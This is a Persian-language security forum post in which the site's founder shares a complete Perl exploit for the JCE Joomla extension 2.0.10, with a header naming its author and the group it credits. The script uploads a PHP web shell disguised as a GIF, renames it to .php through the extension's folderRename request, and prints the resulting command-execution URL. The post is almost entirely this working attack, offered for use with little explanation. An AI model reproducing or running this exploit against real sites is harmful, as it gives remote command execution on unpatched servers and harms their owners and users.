رفتن به مطلب

ارسال های توصیه شده

 • موسس سایت

درود

 

اسکریپت پرل (perl) باگ JCE جوملا رو براتون قرار دادم.

######################################### www.bugreport.ir ########################################
#
#           AmnPardaz Security Research & Penetration Testing Group
#
#
# Title:         Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Vendor:         http://www.joomlacontenteditor.net
# Vulnerable Version:   JCE 2.0.10 (prior versions also may be affected)
# Exploitation:      Remote with browser
# Original Advisory:   http://www.bugreport.ir/index_78.htm
# Vendor supplied patch: http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score:    (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5    
# Coded By:        Mostafa Azizi
###################################################################################################
use IO::Socket;
use LWP::Simple;
 system("cls");
if(!defined($ARGV[0])) {
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t||||    Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)   ||||\n\n";
print "\t+--> Usage:  perl $0 <host>    <--+\n";
print "\t+--> Example: perl $0 localhost   <--+\n\n";
exit; }
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t||||    Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)   ||||\n\n";
$TARGET = $ARGV[0];
$PORT  = "80";
$SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";
$SHELL = "/images/stories/0day.php?cmd=";
$HTTP  = "http://";

$header1G = "GET $SCRIPT HTTP/1.1";
$header1H = "HEAD /images/stories/0day.php HTTP/1.1";
$header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";
$header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";
$header2 = "Host: $TARGET";
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
$header5 = "Content-Length: 769";
$header6 = "-----------------------------41184676334";
$header7 = 'Content-Disposition: form-data; name="upload-dir"';
$header8 = '/';
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
$header10 = 'Content-Type: application/octet-stream';
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
$header12 = "0";
$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';
$header14 = 'Content-Type: image/gif';
$header15 = 'GIF89aG';
$header16 = "<? system($_GET['cmd']);exit; ?>";
$header17 = 'Content-Disposition: form-data; name="upload-name"';
$header18 = '0day';
$header19 = 'Content-Disposition: form-data; name="action"';
$header20 = 'upload';
$header21 = "-----------------------------41184676334--";
$header22 = 'X-Request: JSON';
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
$header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';
$header24 = "Content-Length: ".length($header25)."";

############################################### Packet 1 --> Checking Exploitability #########################################################
print "\n[*] Checking Exploitability ...\n\n";
sleep 2;
$pageURL=$TARGET.$SCRIPT;
$simplePage=get($pageURL);
@arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title");
while (($count!=10) && ($die != 1)) {
  foreach $arr(@arr){
    if ($simplePage =~ m/$arr/) {
      print "\n[*] Target patched.\n\n";
      $die = 1;
    } else {
      $count++;
        }
    }
  }
 if ($count==5) {print "[*] Target is exploitable.\n\n"};
############################################### Packet 2 --> Uploading shell as a gif file #########################################################
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print "[*] Trying to upload 0day.gif ...\n\n";
print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
sleep 2;
############################################### Packet 3 --> Change Extension from .gif to .php #########################################################
print "[*] Trying to change extension from .gif to .php ...\n\n";
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
############################################### Packet 4 --> Check for successfully uploaded #########################################################
$shellurl=$TARGET.$SHELL;
$output=get($shellurl);
while ($output = <$remote> ) {
if ($output =~ /200 OK/) {
print "[+] 0day.php was successfully uploaded\n\n";
print "[+] Path:".$TARGET.$SHELL."id\n";
}}

.

 

 

 

موفق باشید.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شرکت گاردایران

پردازشگران ایمن داده ي آدلان

شماره ثبت: 9438

شبکه های اجتماعی

 

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
 • اضافه کردن...

اطلاعات مهم

فعالیت شما در این انجمن به منزله تایید قوانین انجمن میباشد! شرایط استفاده